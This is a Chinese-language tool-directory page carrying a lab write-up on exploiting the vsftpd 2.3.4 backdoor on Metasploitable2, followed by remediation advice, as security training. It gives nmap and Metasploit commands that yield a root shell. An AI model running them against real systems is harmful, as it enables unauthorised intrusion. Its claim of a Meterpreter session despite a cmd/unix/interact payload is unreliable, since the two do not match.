Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
metasploitable2-vsftpd-writeup — 在 Metasploitable2 上利用 vsftpd 2.3.4 后门(CVE-2011-2523)——一篇涵盖侦察、漏洞利用与修复的实战渗透测试实验记录。 | Kitploit
工具/GitHubGitHub/rsakthikumar-cmd/metasploitable2-vsftpd-writeup
侦察漏洞扫描器漏洞分析漏洞利用后渗透利用渗透测试学习与教育实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
rsakthikumar-cmd/metasploitable2-vsftpd-writeup

metasploitable2-vsftpd-writeup

在 Metasploitable2 上利用 vsftpd 2.3.4 后门(CVE-2011-2523)——一篇涵盖侦察、漏洞利用与修复的实战渗透测试实验记录。

查看仓库
1天前尚未审核

Metasploitable2 — vsftpd 2.3.4 后门漏洞利用

一个动手实验,演示在隔离的 Kali Linux ↔ Metasploitable2 环境中,发现并利用 vsftpd 2.3.4 中一个已知后门漏洞的完整过程。

目标

针对一台刻意留有漏洞的目标机器,练习渗透测试的核心工作流程——信息收集、漏洞识别、漏洞利用与后渗透验证。

实验环境

组件详情
攻击机Kali Linux 2026.1 (VMware)
目标机Metasploitable2 (VMware)
网络NAT,与宿主机/互联网隔离
目标 IP192.168.233.129

两台虚拟机均置于同一私有网段,并与真实网络隔离,以确保本次练习不存在任何外部暴露。

方法

1. 信息收集 — Nmap 扫描

root@kitploit:~
nmap -sV -sC 192.168.233.129

对目标进行开放端口和服务版本扫描。结果包括:

root@kitploit:~
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
...

显示 vsftpd 2.3.4 的 Nmap 扫描结果

2. 漏洞识别

端口 21 运行的是 vsftpd 2.3.4。该特定版本在公开领域已知存在后门:2011 年,官方 vsftpd 源码压缩包被入侵并植入了恶意代码。使用包含 :) 字符串的用户名登录,会触发 TCP 6200 端口上的隐藏监听器,从而获得一个无需认证的远程 Shell。

  • 参考: CVE-2011-2523
  • 影响: 以 root 身份执行未认证的远程代码

3. 漏洞利用 — Metasploit

root@kitploit:~
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.233.129
set payload cmd/unix/interact
run

该漏洞利用成功触发了后门,并返回了一个 Meterpreter 会话。

Metasploit 漏洞利用运行,显示已打开的 Meterpreter 会话

4. 后渗透验证

root@kitploit:~
sessions -i 1
sysinfo
getuid

确认了受害主机上的活动会话及访问权限级别。

sysinfo 输出

确认 root 权限的 getuid 输出

结果

通过利用一个过时且被植入后门的服务,无需任何认证便获得了目标机器的完整 root 级远程 Shell 访问权限。

根本原因

  • 软件版本过时(vsftpd 2.3.4),已知源码被篡改
  • 缺乏检测或修补已知含漏洞服务版本的流程

修复建议

  • 将 vsftpd 升级到经过验证、纯净无毒的当前版本
  • 始终从官方/经过验证的软件源下载软件包,并进行校验和验证
  • 实施定期漏洞扫描,在部署前发现过时的服务版本
  • 限制不必要的对外服务(如 FTP),或在不需要时将其置于额外的访问控制之后

核心要点

一个存在已知公开漏洞的过时服务,就足以导致系统被完全渗透——无需开发自定义漏洞利用代码,也无需高级技术。这凸显了补丁管理和版本卫生为何是现实世界安全态势的根基。

免责声明

本次练习仅在 Metasploitable2 上进行,这是一台为安全培训特意设计、刻意留有漏洞的虚拟机,并且整个实验在隔离的实验室网络中进行,与生产系统或任何第三方基础设施均无连接。

下载工具